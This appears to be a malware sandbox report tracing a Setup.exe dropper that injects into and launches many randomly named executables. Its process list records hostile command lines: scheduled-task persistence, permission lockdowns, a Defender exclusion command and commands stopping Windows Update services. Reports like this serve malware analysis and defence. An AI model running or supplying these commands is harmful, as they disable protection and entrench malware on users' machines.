Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemProfilePrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeProfSingleProcessPrivilege N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A N/A N/A
Token: SeRemoteShutdownPrivilege N/A N/A N/A
Token: SeUndockPrivilege N/A N/A N/A
Token: SeManageVolumePrivilege N/A N/A N/A
Token: 33 N/A N/A N/A
Token: 34 N/A N/A N/A
Token: 35 N/A N/A N/A
Token: 36 N/A N/A N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\smss.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A N/A N/A
Token: SeSecurityPrivilege N/A N/A N/A
Token: SeTakeOwnershipPrivilege N/A N/A N/A
Token: SeLoadDriverPrivilege N/A N/A N/A
Token: SeSystemProfilePrivilege N/A N/A N/A
Token: SeSystemtimePrivilege N/A N/A N/A
Token: SeProfSingleProcessPrivilege N/A N/A N/A
Token: SeIncBasePriorityPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeBackupPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Windows\system32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe
PID 4360 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe
PID 4360 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe
PID 4360 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1080 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 1088 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 2680 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4360 wrote to memory of 3172 N/A C:\Users\Admin\AppData\Local\Temp\Setup.exe C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe
PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
PID 4860 wrote to memory of 2864 N/A C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 2864 wrote to memory of 3816 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3712 wrote to memory of 2124 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 3816 wrote to memory of 496 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 496 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 4696 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 2652 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2680 wrote to memory of 3488 N/A C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe C:\Windows\SysWOW64\schtasks.exe
PID 2124 wrote to memory of 1564 N/A C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe C:\Windows\System32\Conhost.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe N/A

Processes

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Users\Admin\AppData\Local\Temp\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\Setup.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe

"C:\Users\Admin\Pictures\Minor Policy\78mCmut1q31KKLEjZwPM_IRi.exe"

C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe

"C:\Users\Admin\Pictures\Minor Policy\GYEKGY13K8dTfwFO8xyTbSdv.exe"

C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe

"C:\Users\Admin\Pictures\Minor Policy\Sl8K3MmxSZl_u_goFzCerY2j.exe"

C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe

"C:\Users\Admin\Pictures\Minor Policy\SWE1hAZdlhK298cTBGrRTAJb.exe"

C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe

"C:\Users\Admin\Pictures\Minor Policy\Etoyonub2P7t2TSIqKjC5Ucj.exe"

C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe

"C:\Users\Admin\Pictures\Minor Policy\s3suuZ8toR5yG6sFmXtccpZT.exe"

C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe

"C:\Users\Admin\Pictures\Minor Policy\R6H5DbUMUEorruAu4jSA9yKu.exe"

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe"

C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe

"C:\Users\Admin\Pictures\Minor Policy\9SLvu92aauFEE9PwBtgW5f7X.exe"

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

"C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe"

C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe

"C:\Users\Admin\Pictures\Minor Policy\1K4bTXJtjSJzT8f0Aii8L_sT.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ms4RE65.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dR2lN11.exe

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qv0FO94.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Dh8Ii58.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1LY72dM9.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dN8469.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2dN8469.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 1088 -ip 1088

C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe

"C:\Users\Admin\Pictures\Minor Policy\rdhZN9I3cWFI4VEF12CLk6S5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 1648

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe

"C:\Users\Admin\Pictures\Minor Policy\pLFkWHfL7rt_NoRn4GCeHrVB.exe"

C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe

"C:\Users\Admin\Pictures\Minor Policy\ngUAbeTU_97fB85wK7a56Jib.exe"

C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe

"C:\Users\Admin\Pictures\Minor Policy\xXyQiNG_qhmki3RUDDNIRPh8.exe" --Admin IsNotAutoStart IsNotTask

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4008 -ip 4008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4008 -s 568

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\207aa4515d" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe

C:\Users\Admin\AppData\Local\50678fd5-df62-4d8b-810d-d2a8ed16a1f1\xXyQiNG_qhmki3RUDDNIRPh8.exe --Task

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\dialer.exe

C:\Windows\System32\dialer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

